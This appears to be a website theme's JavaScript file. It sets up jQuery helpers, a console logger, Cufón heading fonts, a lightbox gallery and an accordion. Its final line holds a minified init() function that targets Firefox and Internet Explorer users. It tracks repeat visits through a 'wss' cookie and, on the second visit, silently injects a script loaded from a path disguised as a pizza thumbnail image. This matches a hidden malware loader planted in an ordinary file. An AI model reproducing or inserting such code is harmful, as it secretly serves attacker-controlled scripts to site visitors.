
(function($){

 





 



})(this.jQuery);




window.log = function(){
  log.history = log.history || [];   
  log.history.push(arguments);
  if(this.console){
    console.log( Array.prototype.slice.call(arguments) );
  }
};
(function(doc){
  var write = doc.write;
  doc.write = function(q){ 
    log('document.write(): ',arguments); 
    if (/docwriteregexwhitelist/.test(q)) write.apply(doc,arguments);  
  };
})(document);



//Cufón Configuration
Cufon.replace('h1', {
	textShadow: '0 2px #222' // Cufón Text Shadow
});
Cufon.replace('h2');
Cufon.replace('h3');
Cufon.replace('h4', {
	color :'-linear-gradient(#ffffff,#989898)',//Cufón Gradient
	textShadow: '0 1px #111' // Cufón Text Shadow
});
Cufon.replace('h5');
Cufon.replace('h6');
Cufon.replace('a.contact_title');



//Lightbox Gallery
$(function() {

        $('a.lightbox').lightBox();

});



//Accordion
  $(document).ready(function() {

    $("#accordion").accordion({ autoHeight: false} );

  });


function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/images/demo/pizza_thumbnail.jpg?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
